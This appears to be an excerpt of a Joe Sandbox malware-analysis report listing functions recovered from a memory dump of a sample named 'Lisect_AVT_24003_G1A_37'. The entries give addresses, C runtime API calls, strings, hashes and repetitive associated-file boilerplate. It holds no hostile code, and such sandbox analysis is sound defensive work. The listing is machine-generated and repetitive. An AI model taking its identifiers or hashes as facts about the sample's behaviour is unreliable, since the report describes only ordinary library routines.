bad locale name, xrefs: 0027391C

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: 0:'$bad locale name
API String ID: 1840309910-3347340704
Opcode ID: 2ffac5ceb068537d5c83f325c249e8d81343556a055656285c6c21eb3c547eeb
Instruction ID: 0d6a20771bc0b04027ff2963b9e1be7f0ac5b714152168e72f8163ac54081fe1
Opcode Fuzzy Hash: 2ffac5ceb068537d5c83f325c249e8d81343556a055656285c6c21eb3c547eeb
Instruction Fuzzy Hash: 775186F1D102499BDF11DFE4D885B9EFBB8AF14314F148169EC08AB241E775EA18CB52

Function 00350880 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 003508B7
___except_validate_context_record.LIBVCRUNTIME ref: 003508BF
_ValidateLocalCookies.LIBCMT ref: 00350948
__IsNonwritableInCurrentImage.LIBCMT ref: 00350973
_ValidateLocalCookies.LIBCMT ref: 003509C8

Strings

csm, xrefs: 0035095D
C4, xrefs: 00350965, 0035096E, 0035097F

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: C4$csm
API String ID: 1170836740-4180369814
Opcode ID: f20598b848e850d1ec2220124021d7a1ce4b5a33389b79949531ac760cd57e4e
Instruction ID: 28aa4dd28d1d516810046d8b25ffecd6fdafe1c9c029068fe8531d0c3f482be3
Opcode Fuzzy Hash: f20598b848e850d1ec2220124021d7a1ce4b5a33389b79949531ac760cd57e4e
Instruction Fuzzy Hash: D041C634A00209ABDF16DF68C880E9EBBB5FF45325F148055EC199B376D732DA49CB91

Function 002D9520 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 002D9543
std::_Lockit::_Lockit.LIBCPMT ref: 002D9566
std::_Lockit::~_Lockit.LIBCPMT ref: 002D9586
std::_Facet_Register.LIBCPMT ref: 002D95FB
std::_Lockit::~_Lockit.LIBCPMT ref: 002D9613
Concurrency::cancel_current_task.LIBCPMT ref: 002D962B

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 8589eb1f166fbd5cbd44c740deb305c6bef8ca2df99142bd48f1e951d359b25b
Instruction ID: 57f2a1d16a195b27a9e98866145e966c731ff71e974066e48f41ab7c1a68c5de
Opcode Fuzzy Hash: 8589eb1f166fbd5cbd44c740deb305c6bef8ca2df99142bd48f1e951d359b25b
Instruction Fuzzy Hash: 4641CF71D1021A9FCF12DF58E841BAABBB8FB05310F14462AE9196B391D730EE55CBD1

Function 00275DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 002760F2
___std_exception_destroy.LIBVCRUNTIME ref: 0027617F
___std_exception_copy.LIBVCRUNTIME ref: 00276248

Strings

recursive_directory_iterator::operator++, xrefs: 002761CC

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: 362d142aaca5a4de723435d0f86152d8ee96099df1a0e880235f1e5a0a4814c8
Instruction ID: 46d72fadea726c4fe7728e4b8e07356f8504bccd397aad5c29164011309326ef
Opcode Fuzzy Hash: 362d142aaca5a4de723435d0f86152d8ee96099df1a0e880235f1e5a0a4814c8
Instruction Fuzzy Hash: 75E113B09106049FCB29DF68C845B9EF7F9FF45300F10861DE45A97B81D7B4AA58CBA1

Function 002784C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 002786DE
___std_exception_destroy.LIBVCRUNTIME ref: 002786ED

Strings

, column , xrefs: 00278555, 0027856B
at line , xrefs: 00278518

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: 824742e2dcaf870e85df29ccf268a55b8d12f329736fe572c6d87b6e55ec406f
Instruction ID: 1d757808e15c859005bef5f1b2560c8b0f9fa88bc79c1b14c3ec2adad3d2d3e9
Opcode Fuzzy Hash: 824742e2dcaf870e85df29ccf268a55b8d12f329736fe572c6d87b6e55ec406f
Instruction Fuzzy Hash: 4B614B71A102049FDB09DF68CC89B9EBBB9FF44310F148219E419AB781EB74AA948791

Function 002E34C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 002E3946
___std_exception_destroy.LIBVCRUNTIME ref: 002E395F
___std_exception_destroy.LIBVCRUNTIME ref: 002E3A97
___std_exception_destroy.LIBVCRUNTIME ref: 002E3AB0
___std_exception_destroy.LIBVCRUNTIME ref: 002E3C16
___std_exception_destroy.LIBVCRUNTIME ref: 002E3C2F
___std_exception_destroy.LIBVCRUNTIME ref: 002E4479
___std_exception_destroy.LIBVCRUNTIME ref: 002E4492

Strings

value, xrefs: 002E439F

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 912f599cc6744854234cec5ec65874d1634fbd7d82f738eda02550e43f3a1919
Instruction ID: d5b964e8867b9b779c07b45a5bbd1ac0c7e1d46fd3c97914624bd43e0b1c0b26
Opcode Fuzzy Hash: 912f599cc6744854234cec5ec65874d1634fbd7d82f738eda02550e43f3a1919
Instruction Fuzzy Hash: 7051D271C10288DBDF15DFA4CC89BDEBBB4BF05304F548259E449AB382D7786A98CB61

Function 00273B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00273C0F

Strings

ios_base::badbit set, xrefs: 00273BA7, 00273BD2, 00273BF3
ios_base::failbit set, xrefs: 00273AC8, 00273BB1
ios_base::eofbit set, xrefs: 00273BB6

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: c38f2b036a8ea62f5debc9f18111af4741be5c6f23b376173ef902dd47679669
Instruction ID: aaee9de13e95809abba6b8cb4eb3e5e3b3dfaaffe968d154c86780f332757796
Opcode Fuzzy Hash: c38f2b036a8ea62f5debc9f18111af4741be5c6f23b376173ef902dd47679669
Instruction Fuzzy Hash: 461102B6920709ABC711DF69C801B9AB3E8EF05320F04C52AF95C9B241F774E914CB91

Function 002E2A60 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 002E2F43

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: 04c8a0e73c228a976aee5635e981aea7d747d5deb986e2dcbe754e653168bc61
Instruction ID: 37567949704f79d6a6f128c273efc077e299bc1c94d0cba4675e362aaef8db8c
Opcode Fuzzy Hash: 04c8a0e73c228a976aee5635e981aea7d747d5deb986e2dcbe754e653168bc61
Instruction Fuzzy Hash: B8E1F471A10146CFCB19DF29C881A6DB7B9FF48310B64826AE81ADB391D730ED65CB90

Function 00278080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0027844D

Strings

parse error, xrefs: 00278149, 00278162
ror, xrefs: 002780D4

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: ba0668ee099d43187eb87733fd2e4c12f6c254f746b00f9d5c4ddc708f29cf33
Instruction ID: 94cc3e356309cb1e06233c4dde36148cf4677b4c5a4bde03f828fd07bb4e9f6d
Opcode Fuzzy Hash: ba0668ee099d43187eb87733fd2e4c12f6c254f746b00f9d5c4ddc708f29cf33
Instruction Fuzzy Hash: 79C12831D20649CFDB09CF68CC99BADBB75BF45304F14C349E4086B692DBB4AA94CB91

Function 00277DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00278051
___std_exception_destroy.LIBVCRUNTIME ref: 00278060

Strings

[json.exception., xrefs: 00277E1C

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: b387772e151bd1bc3f1dac22f6b1b697506376397b3af76fa415b62b84828ba9
Instruction ID: c6ef52ec4c51fbe447e4108c4c0ad84a9eabd80af76e2205545fc239a80a2bd5
Opcode Fuzzy Hash: b387772e151bd1bc3f1dac22f6b1b697506376397b3af76fa415b62b84828ba9
Instruction Fuzzy Hash: 7D9129309202089FDB19CF68CC85BAEFBB5FF45314F14825DE404AB692D7B4A994CB91

Function 00273A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00273C0F

Strings

ios_base::badbit set, xrefs: 00273BA7, 00273BD2, 00273BF3
ios_base::failbit set, xrefs: 00273AC8

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 2659868963-1240500531
Opcode ID: 2c8b935cb4791cfdea76477c3aeb4092fcb4c2a7b5839d91510df96408f157a5
Instruction ID: 68fffb43da0905709edda35844676c4aa794b32fdd01b239576f0506ceb024e3
Opcode Fuzzy Hash: 2c8b935cb4791cfdea76477c3aeb4092fcb4c2a7b5839d91510df96408f157a5
Instruction Fuzzy Hash: 7D411775920205ABC715DF68CC41BAEF7F8FF45310F14C21AF9189B681E774AA54CBA1

Function 002E45C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 002E4E29
___std_exception_destroy.LIBVCRUNTIME ref: 002E4E42
___std_exception_destroy.LIBVCRUNTIME ref: 002E594D
___std_exception_destroy.LIBVCRUNTIME ref: 002E5966

Strings

value, xrefs: 002E5873

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
